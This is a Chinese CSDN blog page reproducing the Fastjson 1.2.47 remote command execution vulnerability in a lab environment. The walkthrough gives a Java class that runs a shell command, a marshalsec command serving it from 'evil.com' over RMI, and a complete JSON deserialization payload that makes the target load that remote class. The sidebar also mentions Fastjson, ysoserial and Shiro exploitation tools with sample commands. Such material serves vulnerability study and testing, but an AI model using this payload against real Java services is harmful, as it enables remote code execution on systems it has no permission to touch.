rmi远程代码执行漏洞_Fastjson 1.2.47 远程命令执行漏洞 - 漏洞环境

最新推荐文章于 2021-11-16 06:30:00 发布
最新推荐文章于 2021-11-16 06:30:00 发布
阅读量137 收藏
点赞数
文章标签: rmi远程代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39686192/article/details/111818835
版权

Fastjson 1.2.47 远程命令执行漏洞

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

参考链接:

漏洞环境

访问http://your-ip:8092即可看到一个json对象被返回,我们将content-type修改为application/json后可向其POST新的JSON对象,后端会利用fastjson进行解析。

漏洞复现

目标环境是openjdk:8u102,这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制,我们可以简单利用RMI进行命令执行。

首先编译并上传命令执行代码,如http://evil.com/TouchFile.class:// javac TouchFile.java

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"touch", "/tmp/success"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}

}

}

然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999

向靶场服务器发送Payload:{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

},

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://evil.com:9999/Exploit",

"autoCommit":true

}

}

可见,命令touch /tmp/success已成功执行:

更多利用方法请参考JNDI注入相关知识。

点击此处 👋 访问漏洞环境

weixin_39686192
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RMI远程调用代码及使用方法
04-10
RMI简单远程调用,实现数字相加!代码简单易懂
前端系列课程之axios应用(一)
qiuqiudongdong的博客
10-15 310
axios应用: 目标: 掌握axios的安装和引用 掌握axios服务器的请求方法 掌握axios拦截器的设置 掌握axios实战应用 Axios概述: axios是一个第三方库,支持前后端发起的http请求 官网 http://www.axios-js.com/ 安装 npm install axios –S axios引用方法: 全局引用 组件引用 在组件的script中导入axios axios的服务器请求
rmi远程代码执行漏洞_Fastjson 1.2.47 远程命令执行漏洞
weixin_39919195的博客
12-22 424
各位大佬,最近好么由于找工作,以及适应新环境,导致快3个月没有更新文章了,感觉有点对不住大家。话不多说,今天带大家复现一下Fastjson1.2.47远程命令执行漏洞漏洞实现流程准备环境本次漏洞复现需要有三台设备(两台也可以)主机A:模拟Fastjson漏洞环境(centos7)主机B:模拟攻击机,需要开启web服务(windows10)主机C:搭设RMI服务(可以同主机B配置在一起,我的环境是...
如何保护企业网络免受DDoS攻击?—Vecloud微云
vecloud的博客
09-21 128
使DNS服务器成为放大攻击的目标选择的原因在于,它们的Internet基础结构旨在每分钟处理数百万个请求,并连接到高带宽链接以处理这种流量。 因此,犯罪者利用DNS服务器行为来放大攻击,并将最初的小查询转变为较大的有效负载,从而使服务器停机。 DNS服务器负责将域名解析为IP地址。DNS放大攻击将带有被攻击者的伪造IP地址的DNS查询发送到一个开放的DNS解析器,提示其使用DNS响应来回复该地址。随着大量虚假查询的发出,网络很快就会被大量的DNS响应所淹没。大量的虚假流量将使网络变慢或产生不存在的连接。 .
RMI反序列化漏洞分析
蚁景网安学院
08-15 451
RMI简介首先看一下RMI在wikipedia上的描述:Java远程方法调用,即JavaRMI(JavaRemote MethodInvocation)是Java编程语言里,一种用于实现...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
log4j远程执行漏洞,测试源码
12-22
标题提及的是“log4j远程执行漏洞”,这指的是Log4j 2框架中的一个严重安全漏洞,通常称为CVE-2021-44228,也被广泛称为“Log4Shell”漏洞。这个漏洞允许攻击者通过在日志记录语句中注入恶意代码来实现远程代码执行...
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
Log4J2远程代码执行漏洞修复20211210.rar
12-13
《Log4J2远程代码执行漏洞修复详解》 在IT安全领域,Log4J2的远程代码执行漏洞(CVE-2021-44228)引起了广泛关注。此漏洞影响了全球无数使用Java日志框架Log4J2的应用程序,其严重性在于它允许攻击者通过注入特定的...
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
rmi 反序列化漏洞_java反序列化漏洞—被低估的破坏之王
weixin_39788256的博客
12-31 160
【IT168资讯】IT168资讯】近日,2015年最为被低估的,具有巨大破坏力的漏洞浮出水面。在FoxGlove Security安全团队的@breenmachine 发布一篇博客中介绍了该漏洞在最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS中的应用,实现远程代码执行。更为严重的是,在漏洞被发现的9个月后依然没有有效的java库补丁来针对受到影响的产品...
JAVA RMI 反序列化远程命令执行漏洞
LeeHDsniper的博客
05-11 2万+
JAVA RMI 反序列化远程命令执行漏洞 漏洞资料 背景 原理 Payload构造 搭建本地测试环境 开启包含第三方库的RMI服务 测试RMI客户端 攻击测试 升级版攻击 Weblogic Commons-Collections反序列化RCE漏洞CVE-2015-4852JAVA RMI 反序列化远程命令执行漏洞漏洞资料Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-324
Java RMI服务远程命令执行利用
热门推荐
Exploit的小站~
05-10 3万+
-------------------------------------------------------------- 很长时间没更新博客了,今天来一发。 -------------------------------------------------------------- 0x00 介绍 Java RMI服务是远程方法调用(Remote Method Invocatio...
RMI反序列漏洞复现-——手把手光速复现,工具超全
weixin_37771454的博客
03-24 3087
RMI反序列漏洞复现-手把手光速复现,工具超全一、靶机部署:二、本机怎样查看是不是可以回显?三、attackRMI利用 RMI是REMOTE METHOD INVOCATION的简称,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,...
21 - vulhub - fastjson 反序列化导致任意命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-16 972
fastjson 阿里巴巴开发的一个JSON解析库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
fastjson1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
1ance's blog
07-24 1507
CVE-2017-18349漏洞原理 漏洞原理
Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
EC_Carrot的博客
07-06 270
影响范围 Apache JMeter其2.x版本和3.x版本 漏洞复现 我们还是依靠ysoserial进行利用: java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success' 返回查看容器
Ubuntu Linux中vsFTP添加用户
zhouzhiwengang的专栏
07-03 4464
 按照  http://xinchibaobei.blog.163.com/blog/static/1263925092009101074313369 搭建好 vsFTP 后,发现只能用 ftp 或 anonymous 用户才能访问,就连root和自己的登录账号都无法访问。 这当然不爽!参考网上抄来抄去的方法,都说要装 libdb3-util ,后面还有大堆的安装和配置,懒得动。
fastjson1.2.47漏洞复现
最新发布
07-27
- *1* *3* [Fastjson命令执行漏洞复现(1.2.47和1.2.24)](https://blog.csdn.net/xiaobai_20190815/article/details/124117105)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值